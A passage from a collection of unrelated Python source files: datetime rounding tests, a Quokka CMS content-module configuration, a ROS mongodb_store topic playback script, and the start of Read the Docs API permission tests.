            datetime(2012, 12, 31, 11, tzinfo=NEW_YORK),
            timedelta(days=1),
            datetime(2013, 1, 1, tzinfo=NEW_YORK),
        ),
    ],
)
def test_ceil_datetime(dt, nearest, expected):
    """ceil_datetime always rounds dt UP to the next multiple of nearest."""
    assert ceil_datetime(dt, nearest) == expected
# Each case is (input datetime, rounding granularity, expected floor).
# Same coverage matrix as test_ceil_datetime: minute/hour/day, naive/tz-aware.
@pytest.mark.parametrize(
    "dt,nearest,expected",
    [
        # nearest minute, naive
        (
            datetime(2012, 12, 31, 23, 59, 31, 999999),
            timedelta(minutes=1),
            datetime(2012, 12, 31, 23, 59),
        ),
        (
            datetime(2012, 12, 31, 23, 59, 31),
            timedelta(minutes=1),
            datetime(2012, 12, 31, 23, 59),
        ),
        (
            datetime(2012, 12, 31, 23, 59, 30),
            timedelta(minutes=1),
            datetime(2012, 12, 31, 23, 59),
        ),
        (
            datetime(2012, 12, 31, 23, 59, 29),
            timedelta(minutes=1),
            datetime(2012, 12, 31, 23, 59),
        ),
        # nearest minute, tz-aware
        (
            datetime(2012, 12, 31, 23, 59, 31, tzinfo=NEW_YORK),
            timedelta(minutes=1),
            datetime(2012, 12, 31, 23, 59, tzinfo=NEW_YORK),
        ),
        (
            datetime(2012, 12, 31, 23, 59, 30, tzinfo=NEW_YORK),
            timedelta(minutes=1),
            datetime(2012, 12, 31, 23, 59, tzinfo=NEW_YORK),
        ),
        (
            datetime(2012, 12, 31, 23, 59, 29, tzinfo=NEW_YORK),
            timedelta(minutes=1),
            datetime(2012, 12, 31, 23, 59, tzinfo=NEW_YORK),
        ),
        # nearest hour, naive
        (
            datetime(2012, 12, 31, 23, 31),
            timedelta(hours=1),
            datetime(2012, 12, 31, 23),
        ),
        (
            datetime(2012, 12, 31, 23, 30),
            timedelta(hours=1),
            datetime(2012, 12, 31, 23),
        ),
        (
            datetime(2012, 12, 31, 23, 29),
            timedelta(hours=1),
            datetime(2012, 12, 31, 23),
        ),
        # nearest hour, tz-aware
        (
            datetime(2012, 12, 31, 23, 31, tzinfo=NEW_YORK),
            timedelta(hours=1),
            datetime(2012, 12, 31, 23, tzinfo=NEW_YORK),
        ),
        (
            datetime(2012, 12, 31, 23, 30, tzinfo=NEW_YORK),
            timedelta(hours=1),
            datetime(2012, 12, 31, 23, tzinfo=NEW_YORK),
        ),
        (
            datetime(2012, 12, 31, 23, 29, tzinfo=NEW_YORK),
            timedelta(hours=1),
            datetime(2012, 12, 31, 23, tzinfo=NEW_YORK),
        ),
        # nearest day, naive
        (
            datetime(2012, 12, 31, 13),
            timedelta(days=1),
            datetime(2012, 12, 31),
        ),
        (
            datetime(2012, 12, 31, 12),
            timedelta(days=1),
            datetime(2012, 12, 31),
        ),
        (
            datetime(2012, 12, 31, 11),
            timedelta(days=1),
            datetime(2012, 12, 31),
        ),
        # nearest day, tz-aware
        (
            datetime(2012, 12, 31, 13, tzinfo=NEW_YORK),
            timedelta(days=1),
            datetime(2012, 12, 31, tzinfo=NEW_YORK),
        ),
        (
            datetime(2012, 12, 31, 12, tzinfo=NEW_YORK),
            timedelta(days=1),
            datetime(2012, 12, 31, tzinfo=NEW_YORK),
        ),
        (
            datetime(2012, 12, 31, 11, tzinfo=NEW_YORK),
            timedelta(days=1),
            datetime(2012, 12, 31, tzinfo=NEW_YORK),
        ),
    ],
)
def test_floor_datetime(dt, nearest, expected):
    """floor_datetime always rounds dt DOWN to the previous multiple of nearest."""
    assert floor_datetime(dt, nearest) == expected
# Each case is (input datetime, rounding granularity, expected rounding).
# Inputs below the halfway point round down; exact halves round up.
@pytest.mark.parametrize(
    "dt,nearest,expected",
    [
        # nearest minute, naive (>=30s rounds up, <30s rounds down)
        (
            datetime(2012, 12, 31, 23, 59, 31, 999999),
            timedelta(minutes=1),
            datetime(2013, 1, 1),
        ),
        (
            datetime(2012, 12, 31, 23, 59, 31),
            timedelta(minutes=1),
            datetime(2013, 1, 1),
        ),
        (
            datetime(2012, 12, 31, 23, 59, 30),
            timedelta(minutes=1),
            datetime(2013, 1, 1),
        ),
        (
            datetime(2012, 12, 31, 23, 59, 29),
            timedelta(minutes=1),
            datetime(2012, 12, 31, 23, 59),
        ),
        # nearest minute, tz-aware
        (
            datetime(2012, 12, 31, 23, 59, 31, tzinfo=NEW_YORK),
            timedelta(minutes=1),
            datetime(2013, 1, 1, tzinfo=NEW_YORK),
        ),
        (
            datetime(2012, 12, 31, 23, 59, 30, tzinfo=NEW_YORK),
            timedelta(minutes=1),
            datetime(2013, 1, 1, tzinfo=NEW_YORK),
        ),
        (
            datetime(2012, 12, 31, 23, 59, 29, tzinfo=NEW_YORK),
            timedelta(minutes=1),
            datetime(2012, 12, 31, 23, 59, tzinfo=NEW_YORK),
        ),
        # nearest hour, naive (>=30min rounds up)
        (
            datetime(2012, 12, 31, 23, 31),
            timedelta(hours=1),
            datetime(2013, 1, 1),
        ),
        (
            datetime(2012, 12, 31, 23, 30),
            timedelta(hours=1),
            datetime(2013, 1, 1),
        ),
        (
            datetime(2012, 12, 31, 23, 29),
            timedelta(hours=1),
            datetime(2012, 12, 31, 23),
        ),
        # nearest hour, tz-aware
        (
            datetime(2012, 12, 31, 23, 31, tzinfo=NEW_YORK),
            timedelta(hours=1),
            datetime(2013, 1, 1, tzinfo=NEW_YORK),
        ),
        (
            datetime(2012, 12, 31, 23, 30, tzinfo=NEW_YORK),
            timedelta(hours=1),
            datetime(2013, 1, 1, tzinfo=NEW_YORK),
        ),
        (
            datetime(2012, 12, 31, 23, 29, tzinfo=NEW_YORK),
            timedelta(hours=1),
            datetime(2012, 12, 31, 23, tzinfo=NEW_YORK),
        ),
        # nearest day, naive (>=12h rounds up)
        (datetime(2012, 12, 31, 13), timedelta(days=1), datetime(2013, 1, 1)),
        (datetime(2012, 12, 31, 12), timedelta(days=1), datetime(2013, 1, 1)),
        (
            datetime(2012, 12, 31, 11),
            timedelta(days=1),
            datetime(2012, 12, 31),
        ),
        # nearest day, tz-aware
        (
            datetime(2012, 12, 31, 13, tzinfo=NEW_YORK),
            timedelta(days=1),
            datetime(2013, 1, 1, tzinfo=NEW_YORK),
        ),
        (
            datetime(2012, 12, 31, 12, tzinfo=NEW_YORK),
            timedelta(days=1),
            datetime(2013, 1, 1, tzinfo=NEW_YORK),
        ),
        (
            datetime(2012, 12, 31, 11, tzinfo=NEW_YORK),
            timedelta(days=1),
            datetime(2012, 12, 31, tzinfo=NEW_YORK),
        ),
    ],
)
def test_round_datetime(dt, nearest, expected):
    """round_datetime rounds to the nearest multiple; exact halves round up."""
    assert round_datetime(dt, nearest) == expected
| |
from quokka.core.app import QuokkaModule
from .admin import AdminArticlesView, AdminPagesView, AdminBlocksView
from .views import (
DetailView, PreviewView, ArticleListView, CategoryListView, TagListView,
AuthorListView
)
from .utils import url_for_content, strftime
def configure(app):
    """Attach the content module to the Quokka *app*.

    Registers the admin views and dashboard icons, builds the content
    blueprint with every list/detail/preview URL rule, installs template
    helpers, and registers the finished module on the app.

    Args:
        app: the Quokka application instance being configured.
    """
    # Register admin views
    app.admin.register(
        app.db.index,
        AdminArticlesView,
        name='Articles',
        endpoint='articleview'
    )
    app.admin.register(
        app.db.index,
        AdminPagesView,
        name='Pages',
        endpoint='pageview'
    )
    app.admin.register(
        app.db.index,
        AdminBlocksView,
        name='Blocks',
        endpoint='blockview',
        category='Administration'
    )

    # Admin index panel icons
    app.admin.add_icon(
        endpoint='quokka.core.content.admin.articleview.create_view',
        icon='glyphicon-edit',
        text='New<br>Article'
    )
    app.admin.add_icon(
        endpoint='quokka.core.content.admin.pageview.create_view',
        icon='glyphicon-file',
        text='New<br>Page'
    )
    app.admin.add_icon(
        endpoint='quokka.core.content.admin.blockview.create_view',
        icon='glyphicon-th-list',
        text='New<br>Block'
    )
    # app.admin.add_icon(
    #     endpoint='quokka.core.content.admin.articleview.index_view',
    #     icon='glyphicon-list',
    #     text='All<br>Articles'
    # )

    # Register new commands
    # Register content types
    # Register content formats

    # create new Quokka Module with its views
    module = QuokkaModule(__name__)

    # Build the URL fragment matching any configured content extension,
    # e.g. '<any(html,htm,rss,atom):ext>'.
    # (The former `ext = app.config.get("CONTENT_EXTENSION", "html")`
    # assignment was dead code — immediately overwritten — and was removed.)
    extensions = list(app.config.get('CONTENT_EXTENSION_MAP', {}).keys())
    ext_list = ','.join(extensions or ['html', 'htm', 'rss', 'atom'])
    ext = f'<any({ext_list}):ext>'

    # INDEX|HOME
    # handle /
    module.add_url_rule('/', view_func=ArticleListView.as_view('index'))
    # handle /index.html
    module.add_url_rule(f'/index.{ext}',
                        view_func=ArticleListView.as_view('indexnamed'))
    # handle /2/
    module.add_url_rule('/<int:page_number>/',
                        view_func=ArticleListView.as_view('indexpag'))
    # handle /2.html
    module.add_url_rule(f'/<int:page_number>.{ext}',
                        view_func=ArticleListView.as_view('indexpagext'))
    # handle /2/index.html
    module.add_url_rule(f'/<int:page_number>/index.{ext}',
                        view_func=ArticleListView.as_view('indexpagnamed'))

    # USER
    # handle /@authorname/
    # handle /@authorname/2/
    # handle /@authorname/index.html
    # handle /@authorname/2.html
    # handle /@authorname/2/index.html

    # AUTHORS
    # handle /authors/
    module.add_url_rule('/authors/',
                        view_func=AuthorListView.as_view('authors'))
    # handle /authors/index.html
    module.add_url_rule(f'/authors/index.{ext}',
                        view_func=AuthorListView.as_view('authorsnamed'))
    # AUTHOR
    # handle /author/name/
    module.add_url_rule('/author/<path:author>/',
                        view_func=ArticleListView.as_view('author'))
    # handle /author/name/index.html
    module.add_url_rule(f'/author/<path:author>/index.{ext}',
                        view_func=ArticleListView.as_view('authornamed'))
    # handle /author/name/2
    module.add_url_rule('/author/<path:author>/<int:page_number>/',
                        view_func=ArticleListView.as_view('authorpag'))
    # handle /author/name/2.html
    module.add_url_rule(f'/author/<path:author>/<int:page_number>.{ext}',
                        view_func=ArticleListView.as_view('authorpagext'))
    # handle /author/name/2/index.html
    module.add_url_rule(f'/author/<path:author>/<int:page_number>/index.{ext}',
                        view_func=ArticleListView.as_view('authorpagnamed'))

    # TAGS
    # handle /tags/
    module.add_url_rule('/tags/',
                        view_func=TagListView.as_view('tags'))
    # handle /tags/index.html
    module.add_url_rule(f'/tags/index.{ext}',
                        view_func=TagListView.as_view('tagsnamed'))
    # TAG
    # handle /tag/tagname/
    module.add_url_rule('/tag/<string:tag>/',
                        view_func=ArticleListView.as_view('tag'))
    # handle /tag/tagname/index.html
    module.add_url_rule(f'/tag/<string:tag>/index.{ext}',
                        view_func=ArticleListView.as_view('tagnamed'))
    # handle /tag/tagname/2/
    module.add_url_rule('/tag/<string:tag>/<int:page_number>/',
                        view_func=ArticleListView.as_view('tagpag'))
    # handle /tag/tagname/2.html
    module.add_url_rule(f'/tag/<string:tag>/<int:page_number>.{ext}',
                        view_func=ArticleListView.as_view('tagpagext'))
    # handle /tag/tagname/2/index.html
    module.add_url_rule(f'/tag/<string:tag>/<int:page_number>/index.{ext}',
                        view_func=ArticleListView.as_view('tagpagnamed'))

    # BLOCKS
    # handle /block/slug.html
    module.add_url_rule('/block/<string:block>/',
                        view_func=ArticleListView.as_view('block'))
    # handle /block/blockname/index.html
    module.add_url_rule(f'/block/<string:block>/index.{ext}',
                        view_func=ArticleListView.as_view('blocknamed'))
    # handle /block/blockname/2/
    module.add_url_rule('/block/<string:block>/<int:page_number>/',
                        view_func=ArticleListView.as_view('blockpag'))
    # handle /block/blockname/2.html
    module.add_url_rule(f'/block/<string:block>/<int:page_number>.{ext}',
                        view_func=ArticleListView.as_view('blockpagext'))
    # handle /block/blockname/2/index.html
    module.add_url_rule(f'/block/<string:block>/<int:page_number>/index.{ext}',
                        view_func=ArticleListView.as_view('blockpagnamed'))

    # CATEGORIES
    # handle /categories/
    module.add_url_rule('/categories/',
                        view_func=CategoryListView.as_view('categories'))
    # handle /categories/index.html
    module.add_url_rule(f'/categories/index.{ext}',
                        view_func=CategoryListView.as_view('categoriesnamed'))
    # CATEGORY
    # handle /blog/subcategory/ -- catch-all, so it must come after the
    # fixed-prefix rules above
    module.add_url_rule('/<path:category>/',
                        view_func=ArticleListView.as_view('cat'))
    # handle /blog/subcategory/index.html
    module.add_url_rule(f'/<path:category>/index.{ext}',
                        view_func=ArticleListView.as_view('catnamed'))
    # handle /blog/subcategory/2/
    module.add_url_rule('/<path:category>/<int:page_number>/',
                        view_func=ArticleListView.as_view('catpag'))
    # handle /blog/subcategory/2.html
    module.add_url_rule(f'/<path:category>/<int:page_number>.{ext}',
                        view_func=ArticleListView.as_view('catpagext'))
    # handle /blog/subcategory/2/index.html
    module.add_url_rule(f'/<path:category>/<int:page_number>/index.{ext}',
                        view_func=ArticleListView.as_view('catpagnamed'))

    # ARTICLE|PAGE
    # handle /article-name.html and /foo/bar/article-name.html
    module.add_url_rule(f'/<path:slug>.{ext}',
                        view_func=DetailView.as_view('detail'))
    # handle the .preview of drafts
    module.add_url_rule('/<path:slug>.preview',
                        view_func=PreviewView.as_view('preview'))

    # add template globals to app
    app.add_template_global(url_for_content)
    app.add_template_filter(strftime)

    # add context processors
    @module.context_processor
    def theme_context():
        return {
            'FOO': 'BAR'
        }

    # register the module
    app.register_module(module)
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import rospy
import mongodb_store.util as mg_util
import sys
import time
import pymongo
from multiprocessing import Process
import calendar
import datetime
import threading
import multiprocessing
from rosgraph_msgs.msg import Clock
import signal
import Queue
from optparse import OptionParser
# Resolve the MongoClient class through mongodb_store's compatibility
# helper (handles different pymongo versions).
MongoClient = mg_util.import_MongoClient()
# Dotted document path where mongodb_store records the insertion time;
# used both for queries and as the sort/index key.
TIME_KEY = '_meta.inserted_at'
def max_time(collection):
    """Return the newest _meta.inserted_at datetime stored in *collection*."""
    newest = collection.find_one(sort=[(TIME_KEY, pymongo.DESCENDING)])
    return newest['_meta']['inserted_at']
def min_time(collection):
    """Return the oldest _meta.inserted_at datetime stored in *collection*."""
    oldest = collection.find_one(sort=[(TIME_KEY, pymongo.ASCENDING)])
    return oldest['_meta']['inserted_at']
def to_ros_time(dt):
    """Convert a datetime *dt* (treated as UTC) into a rospy.Time."""
    secs = calendar.timegm(dt.utctimetuple())
    nsecs = dt.microsecond * 1000
    return rospy.Time(secs, nsecs)
def to_datetime(rt):
    """Convert a rospy.Time-like object (``secs``/``nsecs``) to a UTC datetime."""
    whole_seconds = datetime.datetime.utcfromtimestamp(rt.secs)
    fraction = datetime.timedelta(microseconds = rt.nsecs / 1000)
    return whole_seconds + fraction
def ros_time_strftime(rt, format):
    """ converts a ros time to a datetime and calls strftime on it with the given format """
    as_datetime = to_datetime(rt)
    return as_datetime.strftime(format)
def mkdatetime(date_string):
    """Parse a command-line date of the form 'd/m/y H:M' into a datetime."""
    fmt = '%d/%m/%y %H:%M'
    return datetime.datetime.strptime(date_string, fmt)
class PlayerProcess(object):
    """Base class for playback workers that execute in a child process.

    Subclasses must provide ``run(running)``, which the child process
    executes and which should loop while ``running.value`` is true.
    """

    def __init__(self, event, start_time, end_time):
        super(PlayerProcess, self).__init__()
        self.event = event
        self.start_time = start_time
        self.end_time = end_time
        # Process-shared byte flag; flipping it to False asks the child to stop.
        self.running = multiprocessing.Value('b', True)
        self.player_process = multiprocessing.Process(
            target=self.run, args=(self.running,))

    def start(self):
        """Launch the child process."""
        self.player_process.start()

    def stop(self):
        """Request the child process to finish its loop."""
        self.running.value = False

    def join(self):
        """Block until the child process exits."""
        self.player_process.join()

    def is_running(self):
        """Whether the shared stop flag is still set."""
        return self.running.value
class TopicPlayer(PlayerProcess):
    """Replays one mongodb_store collection onto its original ROS topic.

    A producer thread streams documents out of MongoDB in insertion-time
    order into a bounded queue; the child-process main loop consumes the
    queue and publishes each message at its recorded sim time.
    """

    def __init__(self, mongodb_host, mongodb_port, db_name, collection_name, event, start_time, end_time):
        super(TopicPlayer, self).__init__(event, start_time, end_time)
        self.mongodb_host = mongodb_host
        self.mongodb_port = mongodb_port
        self.db_name = db_name
        self.collection_name = collection_name

    def init(self, running):
        """ Called in subprocess to do process-specific initialisation """
        rospy.init_node("mongodb_playback_%s" % self.collection_name)
        # clear signal handlers in this child process, rospy will handle signals for us
        signal.signal(signal.SIGTERM, signal.SIG_DFL)
        signal.signal(signal.SIGINT, signal.SIG_DFL)
        self.mongo_client=MongoClient(self.mongodb_host, self.mongodb_port)
        self.collection = self.mongo_client[self.db_name][self.collection_name]
        # two threads running here, the main one does the publishing
        # the second one populates the queue of things to publish
        # how many messages to buffer ahead of the publisher
        buffer_size = 50
        self.to_publish = Queue.Queue(maxsize=buffer_size)
        self.queue_thread = threading.Thread(target=self.queue_from_db, args=[running])
        self.queue_thread.start()

    def queue_from_db(self, running):
        """Producer thread: stream matching documents into the queue in time order."""
        # make sure there's an index on time in the collection so the sort
        # operation doesn't require the whole collection to be loaded
        self.collection.ensure_index(TIME_KEY)
        # get all documents within the time window, sorted ascending order by time
        documents = self.collection.find({TIME_KEY: { '$gte': to_datetime(self.start_time), '$lte': to_datetime(self.end_time)}}, sort=[(TIME_KEY, pymongo.ASCENDING)])
        if documents.count() == 0:
            rospy.logwarn('No messages to play back from topic %s' % self.collection_name)
            return
        else:
            rospy.logdebug('Playing back %d messages', documents.count())
        # load message class for this collection, they should all be the same
        msg_cls = mg_util.load_class(documents[0]["_meta"]["stored_class"])
        latch = False
        if "latch" in documents[0]["_meta"]:
            latch = documents[0]["_meta"]["latch"]
        # publisher won't be used until something is on the queue, so it's safe to construct it here
        self.publisher = rospy.Publisher(documents[0]["_meta"]["topic"], msg_cls, latch = latch, queue_size = 10)
        for document in documents:
            if running.value:
                # instantiate the ROS message object from the dictionary retrieved from the db
                message = mg_util.dictionary_to_message(document, msg_cls)
                # print (message, document["_meta"]["inserted_at"])
                # put will only work while there is space in the queue, if not it will block until another take is performed
                self.to_publish.put((message, to_ros_time(document["_meta"]["inserted_at"])))
            else:
                break
        rospy.logdebug('All messages queued for topic %s' % self.collection_name)

    def run(self, running):
        """Child-process entry point: consume the queue and publish on schedule."""
        self.init(running)
        # wait until sim clock has initialised
        while rospy.get_rostime().secs == 0:
            # can't use rospy time here as if clock is 0 it will wait forever
            time.sleep(0.2)
        rospy.logdebug('Topic playback ready %s %s' % (self.collection.name, rospy.get_param('use_sim_time')))
        # wait for the signal to start
        self.event.wait()
        # seconds to wait for the producer before re-checking the stop flag
        timeout = 1
        while running.value:
            try:
                msg_time_tuple = self.to_publish.get(timeout=timeout)
                publish_time = msg_time_tuple[1]
                msg = msg_time_tuple[0]
                now = rospy.get_rostime()
                # if we've missed our window
                if publish_time < now:
                    rospy.logwarn('Message out of sync by %f', (now - publish_time).to_sec())
                else:
                    delay = publish_time - now
                    rospy.sleep(delay)
                # rospy.loginfo('diff %f' % (publish_time - rospy.get_rostime()).to_sec())
                self.publisher.publish(msg)
            except Queue.Empty, e:
                # queue may be momentarily empty while the producer catches up
                pass
        self.queue_thread.join()
        self.mongo_client.close()
        rospy.loginfo('Topic playback finished %s' % self.collection.name)
class ClockPlayer(PlayerProcess):
    """ Plays a clock message in a separate thread"""

    def __init__(self, event, start_time, end_time, pre_roll = rospy.Duration(0), post_roll = rospy.Duration(0)):
        super(ClockPlayer, self).__init__(event, start_time, end_time)
        # NOTE(review): start_time/end_time are already stored by the base
        # class; these re-assignments are redundant but harmless.
        self.start_time = start_time
        self.end_time = end_time
        self.pre_roll = pre_roll
        self.post_roll = post_roll

    def init(self):
        """Child-process initialisation: node setup and the first clock tick."""
        # we handle shutdown for this process
        signal.signal(signal.SIGTERM, signal.SIG_DFL)
        signal.signal(signal.SIGINT, signal.SIG_DFL)
        # make sure this node doesn't use sim time
        rospy.set_param('use_sim_time', False)
        rospy.init_node('mongodb_playback_clock_player')
        # switch to simulated time, note that as this is after the init_node, this node DOES NOT use sim time
        rospy.set_param('use_sim_time', True)
        # topic to publish clock on
        self.clock_pub = rospy.Publisher('/clock', Clock, queue_size=1)
        # send the first message to get time off 0
        self.clock_pub.publish(Clock(clock=(self.start_time - self.pre_roll)))
        # notify everyone else that they can move on
        self.event.set()

    def run(self, running):
        """Publish simulated clock ticks from start-pre_roll to end+post_roll."""
        self.init()
        start = self.start_time - self.pre_roll
        end = self.end_time + self.post_roll
        # start value
        clock_msg = Clock(clock=start)
        # timing details, should be moved to constructor parameters
        updates_hz = 1000.0
        rate = rospy.Rate(updates_hz)
        # this assumes close to real-time playback
        update = rospy.Duration(1.0 / updates_hz)
        # wait for the signal to start
        self.event.wait()
        while running.value and clock_msg.clock <= end:
            # update time
            clock_msg.clock += update
            # publish time
            self.clock_pub.publish(clock_msg)
            rate.sleep()
        rospy.logdebug('Playback clock finished')
        # clearing the flag tells the rest of the system playback is over
        running.value = False
class MongoPlayback(object):
    """ Plays back stored topics from the mongodb_store """

    def __init__(self):
        super(MongoPlayback, self).__init__()
        # connection details come from the ROS parameter server
        self.mongodb_host = rospy.get_param("mongodb_host")
        self.mongodb_port = rospy.get_param("mongodb_port")
        self.mongo_client=MongoClient(self.mongodb_host, self.mongodb_port)
        self.stop_called = False

    def setup(self, database_name, req_topics, start_dt, end_dt):
        """ Read in details of requested playback collections.

        Resolves requested topic names against the database, computes the
        playback time window (from start_dt/end_dt strings, or from the
        stored data when either is empty), and constructs the clock and
        topic player processes.
        """
        if database_name not in self.mongo_client.database_names():
            raise Exception('Unknown database %s' % database_name)
        database = self.mongo_client[database_name]
        collection_names = database.collection_names(include_system_collections=False)
        req_topics = set(map(mg_util.topic_name_to_collection_name, req_topics))
        if len(req_topics) > 0:
            topics = req_topics.intersection(collection_names)
            dropped = req_topics.difference(topics)
            if(len(dropped) > 0):
                print('WARNING Dropped non-existant requested topics for playback: %s' % dropped)
        else:
            # no explicit request: play back everything in the database
            topics = set(collection_names)
        print('Playing back topics %s' % topics)
        # create mongo collections
        collections = [database[collection_name] for collection_name in topics]
        # make sure they're easily accessible by time
        for collection in collections:
            collection.ensure_index(TIME_KEY)
        if len(start_dt)==0:
            # get the min and max time across all collections, convert to ros time
            start_time = to_ros_time(min(map(min_time, [collection for collection in collections if collection.count() > 0])))
        else:
            start_time = to_ros_time(mkdatetime(start_dt))
        if len(end_dt)==0:
            end_time = to_ros_time(max(map(max_time, [collection for collection in collections if collection.count() > 0])))
        else:
            end_time = to_ros_time(mkdatetime(end_dt))
        # we don't need a connection any more
        self.mongo_client.close()
        # rospy.loginfo('Playing back from %s' % to_datetime(start_time))
        # rospy.loginfo('.............. to %s' % to_datetime(end_time))
        self.event = multiprocessing.Event()
        # create clock thread
        pre_roll = rospy.Duration(2)
        post_roll = rospy.Duration(0)
        self.clock_player = ClockPlayer(self.event, start_time, end_time, pre_roll, post_roll)
        # create playback objects
        # NOTE(review): map() returning a reusable list is Python 2
        # behaviour (this script uses Queue and except-comma syntax);
        # under Python 3 self.players would be a one-shot iterator and the
        # repeated loops in start/join/stop would break.
        self.players = map(lambda c: TopicPlayer(self.mongodb_host, self.mongodb_port, database_name, c, self.event, start_time - pre_roll, end_time + post_roll), topics)

    def start(self):
        """Start the clock and all topic players, then release them together."""
        self.clock_player.start()
        # wait until clock has set sim time
        self.event.wait()
        self.event.clear()
        # this creates new processes and publishers for each topic
        for player in self.players:
            player.start()
        # all players wait for this before starting --
        # todo: it could happen that his gets hit before all are constructed though
        self.event.set()

    def join(self):
        """Wait for the clock, shut everything down, then wait for the players."""
        self.clock_player.join()
        # if clock runs out but we weren't killed then we need ot stop other processes
        if not self.stop_called:
            self.stop()
        for player in self.players:
            player.join()

    def stop(self):
        """Ask the clock and every topic player to stop."""
        self.stop_called = True
        self.clock_player.stop()
        for player in self.players:
            player.stop()

    def is_running(self):
        """Playback is considered running while the clock player runs."""
        return self.clock_player.is_running()
def main(argv):
    """Command-line entry point: parse options and drive one playback run."""
    myargv = rospy.myargv(argv=argv)
    parser = OptionParser()
    parser.usage += " [TOPICs...]"
    parser.add_option("--mongodb-name", dest="mongodb_name",
                      help="Name of DB from which to retrieve values",
                      metavar="NAME", default="roslog")
    parser.add_option("-s", "--start", dest="start", type="string", default="", metavar='S', help='start datetime of query, defaults to the earliest date stored in db, across all requested collections. Formatted "d/m/y H:M" e.g. "06/07/14 06:38"')
    parser.add_option("-e", "--end", dest="end", type="string", default="", metavar='E', help='end datetime of query, defaults to the latest date stored in db, across all requested collections. Formatted "d/m/y H:M" e.g. "06/07/14 06:38"')
    (options, args) = parser.parse_args(myargv)
    database_name = options.mongodb_name
    # every positional argument after the script name is a topic to play back
    topics = set(args[1:])
    playback = MongoPlayback()

    def signal_handler(signal, frame):
        # INT/TERM trigger a clean shutdown of all player processes
        playback.stop()

    signal.signal(signal.SIGTERM, signal_handler)
    signal.signal(signal.SIGINT, signal_handler)
    playback.setup(database_name, topics, options.start, options.end)
    playback.start()
    playback.join()
    # restore real time for any nodes started after playback ends
    rospy.set_param('use_sim_time', False)

# processes load main so move init_node out
if __name__ == "__main__":
    main(sys.argv)
| |
from __future__ import absolute_import
import json
import base64
import datetime
import mock
from builtins import str
from django.test import TestCase
from django.contrib.auth.models import User
from django_dynamic_fixture import get
from rest_framework import status
from rest_framework.test import APIClient
from allauth.socialaccount.models import SocialAccount
from readthedocs.builds.models import Build, Version
from readthedocs.integrations.models import Integration
from readthedocs.projects.models import Project, Feature
from readthedocs.oauth.models import RemoteRepository, RemoteOrganization
# Pre-encoded HTTP Basic auth headers ("user:password" in base64) for the
# fixture users used throughout these tests.
super_auth = base64.b64encode(b'super:test').decode('utf-8')
eric_auth = base64.b64encode(b'eric:test').decode('utf-8')
class APIBuildTests(TestCase):
    """Permission and serializer tests for the v2 build/command endpoints."""

    fixtures = ['eric.json', 'test_data.json']

    def test_make_build(self):
        """
        Test that a superuser can use the API
        """
        client = APIClient()
        client.login(username='super', password='test')
        resp = client.post(
            '/api/v2/build/',
            {
                'project': 1,
                'version': 1,
                'success': True,
                'output': 'Test Output',
                'error': 'Test Error',
                'state': 'cloning',
            },
            format='json')
        self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
        build = resp.data
        self.assertEqual(build['state_display'], 'Cloning')
        # read the build back and check the stored fields survived
        resp = client.get('/api/v2/build/%s/' % build['id'])
        self.assertEqual(resp.status_code, 200)
        build = resp.data
        self.assertEqual(build['output'], 'Test Output')
        self.assertEqual(build['state_display'], 'Cloning')

    def test_make_build_without_permission(self):
        """Ensure anonymous/non-staff users cannot write the build endpoint"""
        client = APIClient()

        def _try_post():
            # shared probe: the POST must be rejected with 403
            resp = client.post(
                '/api/v2/build/',
                {
                    'project': 1,
                    'version': 1,
                    'success': True,
                    'output': 'Test Output',
                    'error': 'Test Error',
                },
                format='json')
            self.assertEqual(resp.status_code, 403)

        # first anonymous, then as an authenticated non-staff user
        _try_post()
        api_user = get(User, staff=False, password='test')
        assert api_user.is_staff is False
        client.force_authenticate(user=api_user)
        _try_post()

    def test_update_build_without_permission(self):
        """Ensure anonymous/non-staff users cannot update build endpoints"""
        client = APIClient()
        api_user = get(User, staff=False, password='test')
        client.force_authenticate(user=api_user)
        build = get(Build, project_id=1, version_id=1, state='cloning')
        resp = client.put(
            '/api/v2/build/{0}/'.format(build.pk),
            {
                'project': 1,
                'version': 1,
                'state': 'finished'
            },
            format='json')
        self.assertEqual(resp.status_code, 403)

    def test_make_build_protected_fields(self):
        """Ensure build api view delegates correct serializer

        Super users should be able to read/write the `builder` property, but we
        don't expose this to end users via the API
        """
        build = get(Build, project_id=1, version_id=1, builder='foo')
        client = APIClient()

        api_user = get(User, staff=False, password='test')
        client.force_authenticate(user=api_user)
        resp = client.get('/api/v2/build/{0}/'.format(build.pk), format='json')
        self.assertEqual(resp.status_code, 200)

        client.force_authenticate(user=User.objects.get(username='super'))
        resp = client.get('/api/v2/build/{0}/'.format(build.pk), format='json')
        self.assertEqual(resp.status_code, 200)
        # only the staff serializer exposes `builder`
        self.assertIn('builder', resp.data)

    def test_make_build_commands(self):
        """Create build and build commands"""
        client = APIClient()
        client.login(username='super', password='test')
        resp = client.post(
            '/api/v2/build/',
            {
                'project': 1,
                'version': 1,
                'success': True,
            },
            format='json')
        self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
        build = resp.data
        now = datetime.datetime.utcnow()
        resp = client.post(
            '/api/v2/command/',
            {
                'build': build['id'],
                'command': 'echo test',
                'description': 'foo',
                'exit_code': 0,
                'start_time': str(now - datetime.timedelta(seconds=5)),
                'end_time': str(now),
            },
            format='json')
        self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
        resp = client.get('/api/v2/build/%s/' % build['id'])
        self.assertEqual(resp.status_code, 200)
        build = resp.data
        self.assertEqual(len(build['commands']), 1)
        # run_time is derived from start/end timestamps (5 seconds apart)
        self.assertEqual(build['commands'][0]['run_time'], 5)
        self.assertEqual(build['commands'][0]['description'], 'foo')
class APITests(TestCase):
    """Authentication, permission and feature-flag tests for the project API."""

    fixtures = ['eric.json', 'test_data.json']

    def test_make_project(self):
        """
        Test that a superuser can use the API
        """
        post_data = {"name": "awesome-project",
                     "repo": "https://github.com/ericholscher/django-kong.git"}
        resp = self.client.post('/api/v1/project/',
                                data=json.dumps(post_data),
                                content_type='application/json',
                                HTTP_AUTHORIZATION=u'Basic %s' % super_auth)
        self.assertEqual(resp.status_code, 201)
        # fixture data occupies the earlier project ids, so the new one is 24
        self.assertEqual(resp['location'],
                         '/api/v1/project/24/')
        resp = self.client.get('/api/v1/project/24/', data={'format': 'json'},
                               HTTP_AUTHORIZATION=u'Basic %s' % eric_auth)
        self.assertEqual(resp.status_code, 200)
        obj = json.loads(resp.content)
        self.assertEqual(obj['slug'], 'awesome-project')

    def test_user_doesnt_get_full_api_return(self):
        """Admin-only fields such as conf_py_file are hidden from normal users."""
        user_normal = get(User, is_staff=False)
